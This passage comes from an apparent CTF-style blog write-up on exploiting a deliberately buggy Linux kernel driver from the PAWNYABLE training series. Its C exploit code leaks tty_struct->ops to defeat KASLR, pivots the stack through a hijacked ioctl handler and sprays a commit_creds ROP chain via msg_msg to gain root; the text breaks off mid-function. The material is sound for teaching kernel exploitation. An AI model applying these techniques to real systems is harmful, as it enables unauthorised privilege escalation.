  <span class="n">printk</span><span class="p">(</span><span class="n">KERN_INFO</span> <span class="s">"module_close called</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
  <span class="n">kfree</span><span class="p">(</span><span class="n">g_buf</span><span class="p">);</span>
  <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>When we close the kernel driver, <code class="language-plaintext highlighter-rouge">g_buf</code> is freed. As the author explains, this is a buggy code pattern since we can open multiple handles to the driver from within our program. Something like this can occur.</p>

<ol>
  <li>We’ve done nothing, <code class="language-plaintext highlighter-rouge">g_buf = NULL</code></li>
  <li>We’ve opened the driver, <code class="language-plaintext highlighter-rouge">g_buf = 0xffff...a0</code>, and we have <code class="language-plaintext highlighter-rouge">fd1</code> in our program</li>
  <li>We’ve opened the driver a second time, <code class="language-plaintext highlighter-rouge">g_buf = 0xffff...b0</code> . The original value of <code class="language-plaintext highlighter-rouge">0xffff...a0</code> has been overwritten. It can no longer be freed and would cause a memory leak (not super important). We now have <code class="language-plaintext highlighter-rouge">fd2</code> in our program</li>
  <li>We close <code class="language-plaintext highlighter-rouge">fd1</code> which calls <code class="language-plaintext highlighter-rouge">kfree()</code> on <code class="language-plaintext highlighter-rouge">0xffff...b0</code> and frees the same pointer we have a reference to with <code class="language-plaintext highlighter-rouge">fd2</code>.</li>
</ol>

<p>At this point, via our access to <code class="language-plaintext highlighter-rouge">fd2</code>, we have a use after free since we can still potentially use a freed reference to <code class="language-plaintext highlighter-rouge">g_buf</code>. The module also allows us to use the open file descriptor with read and write methods.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">ssize_t</span> <span class="nf">module_read</span><span class="p">(</span><span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">file</span><span class="p">,</span>
                           <span class="kt">char</span> <span class="n">__user</span> <span class="o">*</span><span class="n">buf</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">count</span><span class="p">,</span>
                           <span class="n">loff_t</span> <span class="o">*</span><span class="n">f_pos</span><span class="p">)</span>
<span class="p">{</span>
  <span class="n">printk</span><span class="p">(</span><span class="n">KERN_INFO</span> <span class="s">"module_read called</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>

  <span class="k">if</span> <span class="p">(</span><span class="n">count</span> <span class="o">&gt;</span> <span class="n">BUFFER_SIZE</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">printk</span><span class="p">(</span><span class="n">KERN_INFO</span> <span class="s">"invalid buffer size</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>
  <span class="p">}</span>

  <span class="k">if</span> <span class="p">(</span><span class="n">copy_to_user</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="n">g_buf</span><span class="p">,</span> <span class="n">count</span><span class="p">))</span> <span class="p">{</span>
    <span class="n">printk</span><span class="p">(</span><span class="n">KERN_INFO</span> <span class="s">"copy_to_user failed</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>
  <span class="p">}</span>

  <span class="k">return</span> <span class="n">count</span><span class="p">;</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kt">ssize_t</span> <span class="nf">module_write</span><span class="p">(</span><span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">file</span><span class="p">,</span>
                            <span class="k">const</span> <span class="kt">char</span> <span class="n">__user</span> <span class="o">*</span><span class="n">buf</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">count</span><span class="p">,</span>
                            <span class="n">loff_t</span> <span class="o">*</span><span class="n">f_pos</span><span class="p">)</span>
<span class="p">{</span>
  <span class="n">printk</span><span class="p">(</span><span class="n">KERN_INFO</span> <span class="s">"module_write called</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>

  <span class="k">if</span> <span class="p">(</span><span class="n">count</span> <span class="o">&gt;</span> <span class="n">BUFFER_SIZE</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">printk</span><span class="p">(</span><span class="n">KERN_INFO</span> <span class="s">"invalid buffer size</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>
  <span class="p">}</span>

  <span class="k">if</span> <span class="p">(</span><span class="n">copy_from_user</span><span class="p">(</span><span class="n">g_buf</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="n">count</span><span class="p">))</span> <span class="p">{</span>
    <span class="n">printk</span><span class="p">(</span><span class="n">KERN_INFO</span> <span class="s">"copy_from_user failed</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>
  <span class="p">}</span>

  <span class="k">return</span> <span class="n">count</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>So with these methods, we are able to read and write to our freed object. This is great for us since we’re free to pretty much do anything we want. We are limited somewhat by the object size which is hardcoded in the code to <code class="language-plaintext highlighter-rouge">0x400</code>.</p>

<p>At a high-level, UAFs are generally exploited by creating the UAF condition, so we have a reference to a freed object within our control, and then we want to cause the allocation of a <em>different</em> object to fill the space that was previously filled by our freed object.</p>

<p>So if we allocated a <code class="language-plaintext highlighter-rouge">g_buf</code> of size <code class="language-plaintext highlighter-rouge">0x400</code> and then freed it, we need to place another object in its place. This new object would then be the target of our reads and writes.</p>

<h2 id="kaslr-bypass">KASLR Bypass</h2>

<p>The first thing we need to do is bypass KASLR by leaking some address that is a known static offset from the kernel image base. I started searching for objects that have leakable members and again, @ptrYudai came to the rescue with a catalog on <a href="https://ptr-yudai.hatenablog.com/entry/2020/03/16/165628">useful Linux Kernel data structures</a> for exploitation. This lead me to the <a href="https://elixir.bootlin.com/linux/latest/source/include/linux/tty.h#L195"><code class="language-plaintext highlighter-rouge">tty_struct</code></a> which is allocated on the same slab cache as our <code class="language-plaintext highlighter-rouge">0x400</code> buffer, the <code class="language-plaintext highlighter-rouge">kmalloc-1024</code>. The <code class="language-plaintext highlighter-rouge">tty_struct</code> has a field called <code class="language-plaintext highlighter-rouge">tty_operations</code> which is a pointer to a function table that is a static offset from the kernel base. So if we can leak the address of <code class="language-plaintext highlighter-rouge">tty_operations</code> we will have bypassed KASLR. This struct was used by <a href="https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/">NCCGROUP for the same purpose in their exploit of CVE-2022-32250</a>.</p>

<p>It’s important to note that slab cache that we’re targeting is per-CPU. Luckily, the VM we’re given for the challenge only has one logical core so we don’t have to worry about CPU affinity for this exercise. On most systems with more than one core, we would have to worry about influencing one specific CPU’s cache.</p>

<p>So with our <code class="language-plaintext highlighter-rouge">module_read</code> ability, we will simply:</p>

<ol>
  <li>Free <code class="language-plaintext highlighter-rouge">g_buf</code></li>
  <li>Create <code class="language-plaintext highlighter-rouge">dev_tty</code> structs until one hopefully fills the freed space where <code class="language-plaintext highlighter-rouge">g_buf</code> used to live</li>
  <li>Call <code class="language-plaintext highlighter-rouge">module_read</code> to get a copy of the <code class="language-plaintext highlighter-rouge">g_buf</code> which is now actually our <code class="language-plaintext highlighter-rouge">dev_tty</code> and then inspect the value of <code class="language-plaintext highlighter-rouge">tty_struct-&gt;tty_operations</code>.</li>
</ol>

<p>Here are some snippets of code related to that from the exploit:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Leak a tty_struct-&gt;ops field which is constant offset from kernel base</span>
<span class="kt">uint64_t</span> <span class="nf">leak_ops</span><span class="p">(</span><span class="kt">int</span> <span class="n">fd</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">fd</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Bad fd given to `leak_ops()`"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="cm">/* tty_struct {
        int magic;      // 4 bytes
        struct kref;    // 4 bytes (single member is an int refcount_t)
        struct device *dev; // 8 bytes
        struct tty_driver *driver; // 8 bytes
        const struct tty_operations *ops; (offset 24 (or 0x18))
        ...
    } */</span>

    <span class="c1">// Read first 32 bytes of the structure</span>
    <span class="kt">unsigned</span> <span class="kt">char</span> <span class="o">*</span><span class="n">ops_buf</span> <span class="o">=</span> <span class="n">calloc</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span> <span class="mi">32</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">ops_buf</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Failed to allocate ops_buf"</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="kt">ssize_t</span> <span class="n">bytes_read</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">ops_buf</span><span class="p">,</span> <span class="mi">32</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">bytes_read</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">ssize_t</span><span class="p">)</span><span class="mi">32</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Failed to read enough bytes from fd: %d"</span><span class="p">,</span> <span class="n">fd</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="kt">uint64_t</span> <span class="n">ops</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">ops_buf</span><span class="p">[</span><span class="mi">24</span><span class="p">];</span>
    <span class="n">info</span><span class="p">(</span><span class="s">"tty_struct-&gt;ops: 0x%lx"</span><span class="p">,</span> <span class="n">ops</span><span class="p">);</span>

    <span class="c1">// Solve for kernel base, keep the last 12 bits</span>
    <span class="kt">uint64_t</span> <span class="n">test</span> <span class="o">=</span> <span class="n">ops</span> <span class="o">&amp;</span> <span class="mi">0</span><span class="n">b111111111111</span><span class="p">;</span>

    <span class="c1">// These magic compares are for static offsets on this kernel</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">test</span> <span class="o">==</span> <span class="mh">0xb40ULL</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span> <span class="n">ops</span> <span class="o">-</span> <span class="mh">0xc39b40ULL</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">else</span> <span class="k">if</span> <span class="p">(</span><span class="n">test</span> <span class="o">==</span> <span class="mh">0xc60ULL</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">return</span> <span class="n">ops</span> <span class="o">-</span> <span class="mh">0xc39c60ULL</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">else</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"Got an unexpected tty_struct-&gt;ops ptr"</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>There’s a confusing part about <code class="language-plaintext highlighter-rouge">AND</code>ing off the lower 12 bits of the leaked value and that’s because I kept getting one of two values during multiple runs of the exploit within the same boot. This is probably because there’s two kinds of <code class="language-plaintext highlighter-rouge">tty_structs</code> that can be allocated and they are allocated in pairs. This <code class="language-plaintext highlighter-rouge">if</code> <code class="language-plaintext highlighter-rouge">else if</code> block just handles both cases and solves the kernel base for us. So at this point we have bypassed KASLR because we know the base address the kernel is loaded at.</p>

<h2 id="rip-control">RIP Control</h2>

<p>Next, we need someway to high-jack execution. Luckily, we can use the same data structure, <code class="language-plaintext highlighter-rouge">tty_struct</code> as we can write to the object using <code class="language-plaintext highlighter-rouge">module_write</code> and we can overwrite the pointer value for <code class="language-plaintext highlighter-rouge">tty_struct-&gt;ops</code>.</p>

<p><a href="https://elixir.bootlin.com/linux/latest/source/include/linux/tty_driver.h#L349"><code class="language-plaintext highlighter-rouge">struct tty_operations</code> </a> is a table of function pointers, and looks like this:</p>

<pre><code class="language-C">struct tty_struct * (*lookup)(struct tty_driver *driver,
			struct file *filp, int idx);
	int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
	void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
	int  (*open)(struct tty_struct * tty, struct file * filp);
	void (*close)(struct tty_struct * tty, struct file * filp);
	void (*shutdown)(struct tty_struct *tty);
	void (*cleanup)(struct tty_struct *tty);
	int  (*write)(struct tty_struct * tty,
		      const unsigned char *buf, int count);
	int  (*put_char)(struct tty_struct *tty, unsigned char ch);
	void (*flush_chars)(struct tty_struct *tty);
	unsigned int (*write_room)(struct tty_struct *tty);
	unsigned int (*chars_in_buffer)(struct tty_struct *tty);
	int  (*ioctl)(struct tty_struct *tty,
		    unsigned int cmd, unsigned long arg);
...SNIP...
</code></pre>

<p>These functions are invoked on the <code class="language-plaintext highlighter-rouge">tty_struct</code> when certain actions are performed on an instance of a <code class="language-plaintext highlighter-rouge">tty_struct</code>. For example, when the <code class="language-plaintext highlighter-rouge">tty_struct</code>’s controlling process exits, several of these functions are called in a row: <code class="language-plaintext highlighter-rouge">close()</code>, <code class="language-plaintext highlighter-rouge">shutdown()</code>, and <code class="language-plaintext highlighter-rouge">cleanup()</code>.</p>

<p>So our plan, will be to:</p>

<ol>
  <li>Create UAF condition</li>
  <li>Occupy free’d memory with <code class="language-plaintext highlighter-rouge">tty_struct</code></li>
  <li>Read a copy of the <code class="language-plaintext highlighter-rouge">tty_struct</code> back to us in userland</li>
  <li>Alter the <code class="language-plaintext highlighter-rouge">tty-&gt;ops</code> value to point to a faked function table that we control</li>
  <li>Write the new data back to the <code class="language-plaintext highlighter-rouge">tty_struct</code> which is now corrupted</li>
  <li>Do something to the <code class="language-plaintext highlighter-rouge">tty_struct</code> that causes a function we control to be invoked</li>
</ol>

<p>PAWNYABLE tells us that a popular target is invoking <code class="language-plaintext highlighter-rouge">ioctl()</code> as the function takes several arguments which are user-controlled.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span>  <span class="p">(</span><span class="o">*</span><span class="n">ioctl</span><span class="p">)(</span><span class="k">struct</span> <span class="n">tty_struct</span> <span class="o">*</span><span class="n">tty</span><span class="p">,</span>
		    <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">cmd</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">arg</span><span class="p">);</span>
</code></pre></div></div>

<p>From userland, we can supply the values for <code class="language-plaintext highlighter-rouge">cmd</code> and <code class="language-plaintext highlighter-rouge">arg</code>. This gives us some flexibility. The value we can provide for <code class="language-plaintext highlighter-rouge">cmd</code> is somewhat limited as an <code class="language-plaintext highlighter-rouge">unsigned int</code> is only 4 bytes. <code class="language-plaintext highlighter-rouge">arg</code> gives us a full 8 bytes of control over <code class="language-plaintext highlighter-rouge">RDX</code>. Since we can control the contents of <code class="language-plaintext highlighter-rouge">RDX</code> whenever we invoke <code class="language-plaintext highlighter-rouge">ioctl()</code>, we need to find a gadget to pivot the stack to some code in the kernel heap that we can control. I found such a gadget here:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x14fbea: push rdx; xor eax, 0x415b004f; pop rsp; pop rbp; ret;
</code></pre></div></div>

<p>We will push a value from <code class="language-plaintext highlighter-rouge">RDX</code> onto the stack, and then later pop that value into <code class="language-plaintext highlighter-rouge">RSP</code>. When <code class="language-plaintext highlighter-rouge">ioctl()</code> returns, we will return to whatever value we called <code class="language-plaintext highlighter-rouge">ioctl()</code> with in <code class="language-plaintext highlighter-rouge">arg</code>. So the control flow will go something like:</p>

<ol>
  <li>Invoke <code class="language-plaintext highlighter-rouge">ioctl()</code> on our corrupted <code class="language-plaintext highlighter-rouge">tty_struct</code></li>
  <li><code class="language-plaintext highlighter-rouge">ioctl()</code> has been overwritten by a stack-pivot gadget that places the location of our ROP chain into <code class="language-plaintext highlighter-rouge">RSP</code></li>
  <li><code class="language-plaintext highlighter-rouge">ioctl()</code> returns execution to our ROP chain</li>
</ol>

<p>So now we have a new problem, how do we create a fake function table and ROP chain in the kernel heap AND figure out where we stored them?</p>

<h2 id="creatinglocating-a-rop-chain-and-fake-function-table">Creating/Locating a ROP Chain and Fake Function Table</h2>

<p>This is where I started to diverge from the author’s exploitation strategy. I couldn’t quite follow along with the intended solution for this problem, so I began searching for other ways. With our extremely powerful read capability in mind, I remembered the <a href="https://elixir.bootlin.com/linux/latest/source/include/linux/msg.h#L9"><code class="language-plaintext highlighter-rouge">msg_msg</code></a> struct from @ptrYudai’s aforementioned structure catalog, and realized that the structure was perfect for our purposes as it:</p>

<ul>
  <li>Stores arbitrary data inline in the structure body (not via a pointer to the heap)</li>
  <li>Contains a linked-list member that contains the addresses to <code class="language-plaintext highlighter-rouge">prev</code> and <code class="language-plaintext highlighter-rouge">next</code> messages within the same kernel message queue</li>
</ul>

<p>So quickly, a strategy began to form. We could:</p>

<ol>
  <li>Create our ROP chain and Fake Function table in a buffe</li>
  <li>Send the buffer as the body of a <code class="language-plaintext highlighter-rouge">msg_msg</code> struct</li>
  <li>Use our <code class="language-plaintext highlighter-rouge">module_read</code> capability to read the <code class="language-plaintext highlighter-rouge">msg_msg-&gt;list.next</code> and <code class="language-plaintext highlighter-rouge">msg_msg-&gt;list.prev</code> values to know where in the heap at least two of our messages were stored</li>
</ol>

<p>With this ability, we would know exactly what address to supply as an argument to <code class="language-plaintext highlighter-rouge">ioctl()</code> when we invoke it in order to pivot the stack into our ROP chain. Here is some code related to that from the exploit:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Allocate one msg_msg on the heap</span>
<span class="kt">size_t</span> <span class="nf">send_message</span><span class="p">()</span> <span class="p">{</span>
    <span class="c1">// Calcuate current queue</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">num_queue</span> <span class="o">&lt;</span> <span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">err</span><span class="p">(</span><span class="s">"`send_message()` called with no message queues"</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="kt">int</span> <span class="n">curr_q</span> <span class="o">=</span> <span class="n">msg_queue</span><span class="p">[</span><span class="n">num_queue</span> <span class="o">-</span> <span class="mi">1</span><span class="p">];</span>

    <span class="c1">// Send message</span>
    <span class="kt">size_t</span> <span class="n">fails</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">msgbuf</span> <span class="p">{</span>
        <span class="kt">long</span> <span class="n">mtype</span><span class="p">;</span>
        <span class="kt">char</span> <span class="n">mtext</span><span class="p">[</span><span class="n">MSG_SZ</span><span class="p">];</span>
    <span class="p">}</span> <span class="n">msg</span><span class="p">;</span>

    <span class="c1">// Unique identifier we can use</span>
    <span class="n">msg</span><span class="p">.</span><span class="n">mtype</span> <span class="o">=</span> <span class="mh">0x1337</span><span class="p">;</span>

    <span class="c1">// Construct the ROP chain</span>
    <span class="n">memset</span><span class="p">(</span><span class="n">msg</span><span class="p">.</span><span class="n">mtext</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">MSG_SZ</span><span class="p">);</span>

    <span class="c1">// Pattern for offsets (debugging)</span>
    <span class="kt">uint64_t</span> <span class="n">base</span> <span class="o">=</span> <span class="mh">0x41</span><span class="p">;</span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">curr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">msg</span><span class="p">.</span><span class="n">mtext</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">25</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="kt">uint64_t</span> <span class="n">fill</span> <span class="o">=</span> <span class="n">base</span> <span class="o">&lt;&lt;</span> <span class="mi">56</span><span class="p">;</span>
        <span class="n">fill</span> <span class="o">|=</span> <span class="n">base</span> <span class="o">&lt;&lt;</span> <span class="mi">48</span><span class="p">;</span>
        <span class="n">fill</span> <span class="o">|=</span> <span class="n">base</span> <span class="o">&lt;&lt;</span> <span class="mi">40</span><span class="p">;</span>
        <span class="n">fill</span> <span class="o">|=</span> <span class="n">base</span> <span class="o">&lt;&lt;</span> <span class="mi">32</span><span class="p">;</span>
        <span class="n">fill</span> <span class="o">|=</span> <span class="n">base</span> <span class="o">&lt;&lt;</span> <span class="mi">24</span><span class="p">;</span>
        <span class="n">fill</span> <span class="o">|=</span> <span class="n">base</span> <span class="o">&lt;&lt;</span> <span class="mi">16</span><span class="p">;</span>
        <span class="n">fill</span> <span class="o">|=</span> <span class="n">base</span> <span class="o">&lt;&lt;</span> <span class="mi">8</span><span class="p">;</span>
        <span class="n">fill</span> <span class="o">|=</span> <span class="n">base</span><span class="p">;</span>
        
        <span class="o">*</span><span class="n">curr</span><span class="o">++</span> <span class="o">=</span> <span class="n">fill</span><span class="p">;</span>
        <span class="n">base</span><span class="o">++</span><span class="p">;</span> 
    <span class="p">}</span>

    <span class="c1">// ROP chain</span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">rop</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">msg</span><span class="p">.</span><span class="n">mtext</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="n">pop_rdi</span><span class="p">;</span> 
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="mh">0x0</span><span class="p">;</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="n">prepare_kernel_cred</span><span class="p">;</span> <span class="c1">// RAX now holds ptr to new creds</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="n">xchg_rdi_rax</span><span class="p">;</span> <span class="c1">// Place creds into RDI </span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="n">commit_creds</span><span class="p">;</span> <span class="c1">// Now we have super powers</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="n">kpti_tramp</span><span class="p">;</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="mh">0x0</span><span class="p">;</span> <span class="c1">// pop rax inside kpti_tramp</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="mh">0x0</span><span class="p">;</span> <span class="c1">// pop rdi inside kpti_tramp</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">pop_shell</span><span class="p">;</span> <span class="c1">// Return here</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="n">user_cs</span><span class="p">;</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="n">user_rflags</span><span class="p">;</span>
    <span class="o">*</span><span class="n">rop</span><span class="o">++</span> <span class="o">=</span> <span class="n">user_sp</span><span class="p">;</span>
    <span class="o">*</span><span class="n">rop</span>   <span class="o">=</span> <span class="n">user_ss</span><span class="p">;</span>

    <span class="cm">/* struct tty_operations {
        struct tty_struct * (*lookup)(struct tty_driver *driver,
                struct file *filp, int idx);
        int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
        void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
        int  (*open)(struct tty_struct * tty, struct file * filp);
        void (*close)(struct tty_struct * tty, struct file * filp);
        void (*shutdown)(struct tty_struct *tty);
        void (*cleanup)(struct tty_struct *tty);
        int  (*write)(struct tty_struct * tty,
                const unsigned char *buf, int count);
        int  (*put_char)(struct tty_struct *tty, unsigned char ch);
        void (*flush_chars)(struct tty_struct *tty);
        unsigned int (*write_room)(struct tty_struct *tty);
        unsigned int (*chars_in_buffer)(struct tty_struct *tty);
        int  (*ioctl)(struct tty_struct *tty,
                unsigned int cmd, unsigned long arg);
        ...
    } */</span>

    <span class="c1">// Populate the 12 function pointers in the table that we have created.</span>
    <span class="c1">// There are 3 handlers that are invoked for allocated tty_structs when </span>
    <span class="c1">// their controlling process exits, they are close(), shutdown(),</span>
    <span class="c1">// and cleanup(). We have to overwrite these pointers for when we exit our</span>
    <span class="c1">// exploit process or else the kernel will panic with a RIP of </span>
    <span class="c1">// 0xdeadbeefdeadbeef. We overwrite them with a simple ret gadget</span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">func_table</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">msg</span><span class="p">.</span><span class="n">mtext</span><span class="p">[</span><span class="n">rop_len</span><span class="p">];</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">size_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">12</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="c1">// If i == 4, we're on the close() handler, set to ret gadget</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">i</span> <span class="o">==</span> <span class="mi">4</span><span class="p">)</span> <span class="p">{</span> <span class="o">*</span><span class="n">func_table</span><span class="o">++</span> <span class="o">=</span> <span class="n">ret</span><span class="p">;</span> <span class="k">continue</span><span class="p">;</span> <span class="p">}</span>

        <span class="c1">// If i == 5, we're on the shutdown() handler, set to ret gadget</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">i</span> <span class="o">==</span> <span class="mi">5</span><span class="p">)</span> <span class="p">{</span> <span class="o">*</span><span class="n">func_table</span><span class="o">++</span> <span class="o">=</span> <span class="n">ret</span><span class="p">;</span> <span class="k">continue</span><span class="p">;</span> <span class="p">}</span>

        <span class="c1">// If i == 6, we're on the cleanup() handler, set to ret gadget</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">i</span> <span class="o">==</span> <span class="mi">6</span><span class="p">)</span> <span class="p">{</span> <span class="o">*</span><span class="n">func_table</span><span class="o">++</span> <span class="o">=</span> <span class="n">ret</span><span class="p">;</span> <span class="k">continue</span><span class="p">;</span> <span class="p">}</span>

        <span class="c1">// Magic value for debugging</span>
        <span class="o">*</span><span class="n">func_table</span><span class="o">++</span> <span class="o">=</span> <span class="mh">0xdeadbeefdeadbe00</span> <span class="o">+</span> <span class="n">i</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Put our gadget address as the ioctl() handler to pivot stack</span>
    <span class="o">*</span><span class="n">func_table</span> <span class="o">=</span> <span class="n">push_rdx</span><span class="p">;</span>

    <span class="c1">// Spray msg_msg's on the heap</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">msgsnd</span><span class="p">(</span><span class="n">curr_q</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">msg</span><span class="p">,</span> <span class="n">MSG_SZ</span><span class="p">,</span> <span class="n">IPC_NOWAIT</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">fails</span><span class="o">++</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="n">fails</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>I got a bit wordy with the comments in this block, but it’s for good reason. I didn’t want the exploit to ruin the kernel state, I wanted to exit cleanly. This presented a problem as we are completely hi-jacking the <code class="language-plaintext highlighter-rouge">ops</code> function table which the kernel will use to cleanup our <code class="language-plaintext highlighter-rouge">tty_struct</code>. So I found a gadget that simply performs a <code class="language-plaintext highlighter-rouge">ret</code> operation, and overwrote the function pointers for <code class="language-plaintext highlighter-rouge">close()</code>, <code class="language-plaintext highlighter-rouge">shutdown()</code>, and <code class="language-plaintext highlighter-rouge">cleanup()</code> so that when they are invoked, they simply return and the kernel is apparently fine with this and doesn’t panic.</p>

<p>So our message body looks something like:
&lt;—-ROP—-Faked Function Table—-&gt;</p>

<p>Here is the code I used to overwrite the <code class="language-plaintext highlighter-rouge">tty_struct-&gt;ops</code> pointer:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">overwrite_ops</span><span class="p">(</span><span class="kt">int</span> <span class="n">fd</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">g_buf</span><span class="p">[</span><span class="n">GBUF_SZ</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
    <span class="kt">ssize_t</span> <span class="n">bytes_read</span> <span class="o">=</span> <span class="n">read</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">g_buf</span><span class="p">,</span> <span class="n">GBUF_SZ</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">bytes_read</span> <span class="o">!=</span> <span class="p">(</span><span class="kt">ssize_t</span><span class="p">)</span><span class="n">GBUF_SZ</span><span class="p">)</span> <span class="p">{</span>
